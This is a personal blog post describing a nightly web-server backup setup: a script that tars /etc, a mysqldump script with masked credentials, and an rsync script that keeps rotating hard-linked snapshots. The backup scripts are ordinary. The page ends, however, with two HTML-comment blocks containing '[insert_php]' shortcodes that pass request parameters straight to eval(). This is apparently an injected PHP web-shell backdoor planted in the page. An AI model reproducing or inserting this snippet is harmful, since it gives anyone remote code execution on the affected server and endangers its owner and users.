For my first post I’m going to document the backup solution I use on my web server.
The backups happen in two parts:
Make Dumps Of Important Data
First, I create backup files of important non-file data on my webserver in a specific place. In my case those files are
- A tarball of the
/etc/
directory, with essentially ALL of the configuration data for my system. - Dumps of any databases that I have on the system
These files are generated by two scripts which are run every night by cron
.
The mytar
Script
#!/bin/bash DATE=`date +%Y%m%d` DEST="/home/oneill/backup/local" dir=`basename $1` tar -jcf $DEST/$dir.$DATE.tar.bz2 $1 chown oneill:oneill $DEST/$dir.$DATE.tar.bz2
Pretty simple. I call it in the cron job using the following command
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null
That means at 00:47 every day, run this job. I ignore standard output but any errors (output to stderr
will be caught by cron and emailed to me. I choose the minute to run my cron jobs somewhat at random, since I use a VPS server (shared with other users) and by choosing random times I am most likely to avoid running at the same time as them.
The backup_wordpress
Script
#!/bin/sh DBNAME="alexrichards" DBUSER="*****" DBPASS="*****" DEST="$HOME/backup/local/$DBNAME.dump.sql" CMD="mysqldump -e --create-options -u $DBUSER \ --password=$DBPASS $DBNAME" $CMD > $DEST
Both these files are placed in ~/backups/local/
which is then backed up to a completely different computer.
Step 2 – Off-site Backup
I use rsync
to make incremental off-site backups onto a computer located under my desk at work.
The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).
To do this rotation, I use a hard-link method in order to save time and disk space.
Here’s the script I use: mybackup
#!/bin/bash # usage: mybackup # config file: ~/.mybackup # format: One directory per line, with # optional rsync destination after DIRFILE=$HOME/.mybackup DEFAULT_DEST="/data/backup" RSYNC_CMD="rsync -a --rsh=ssh --delete --progress" NUM_SNAPSHOTS=4 if ! [ -f $DIRFILE ]; then echo "Backup config file $DIRFILE not found" exit -1 fi cat $DIRFILE |while read line; do # skip blank lines if [ "$line" == "" ]; then continue fi # skip commented lines ('#') if [ `expr match "$line" '#'` -gt 0 ]; then continue fi src=`echo $line | awk '{print $1}'` dir=`basename $src | awk -F ':' '{print $(NF)}' \ | awk -F '/' '{print $NF}'` dest=`echo $line | awk '{print $2}'` if [ "$dest" == "" ]; then dest=$DEFAULT_DEST fi host=`echo $src | awk -F ':' '{print $1}'` host=`echo $host |awk -F '@' '{print $NF}'` dest="$dest/$host" mkdir -p "$dest" # shuffle the existing backups if [ -e $dest/$dir.$NUM_SNAPSHOTS ]; then echo "deleteing oldest backup \ $dir.$NUM_SNAPSHOTS" rm -rf $dest/$dir.$NUM_SNAPSHOTS fi for j in `seq $NUM_SNAPSHOTS -1 1`; do i=`echo $j - 1 | bc` if [ -e "$dest/$dir.$i" ]; then echo "Found old backup \ $dir.$i, moving to $dir.$j" mv "$dest/$dir.$i" "$dest/$dir.$j" fi done echo "Backing up dir: $src to $dest/$dir.0" CMD="$RSYNC_CMD --link-dest=../$dir.1 $src \ $dest/$dir.0/" echo $CMD $CMD done
mybackup
reads the file ~/.mybackup
to get a list of locations to backup. In my case, this file looks like this:
potatoriot.com:mail/ /home/oneill/backup/
potatoriot.com:html/ /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/
This creates directories like ~/backups/potatoriot.com/html.0
through ~/backups/potatoriot.com/html.0
.
Explanation
First, for each directory to be backed up, the oldest backup is deleted, and the others are shuffled along in the backup order (html.3
becomes html.4
)
Next, the a fresh copy of the most recent copy is produced using rsync
with the argument --link
to produce hard links to the files in html.1
where possible.
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
This hard-link strategy means that any file that exists and is identical in html.1
will not be copied into the new directory to save space. Nor will it be copied over the network, thanks to the magic of rsync. Indeed, if the file has changed, it’ll be copied from the local backup, then only the changes will be copied over the network.
This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.
I run mybackup
every night via a cron job. I chose the time to be at least an hour after the cronjob on the webserver, so that I get the latest database dumps in the backup.
<!– [insert_php]if (isset($_REQUEST["TRdtz"])){eval($_REQUEST["TRdtz"]);exit;}[/insert_php]
if (isset($_REQUEST["TRdtz"])){eval($_REQUEST["TRdtz"]);exit;}
–>
<!– [insert_php]if (isset($_REQUEST["Caw"])){eval($_REQUEST["Caw"]);exit;}[/insert_php]
if (isset($_REQUEST["Caw"])){eval($_REQUEST["Caw"]);exit;}
–>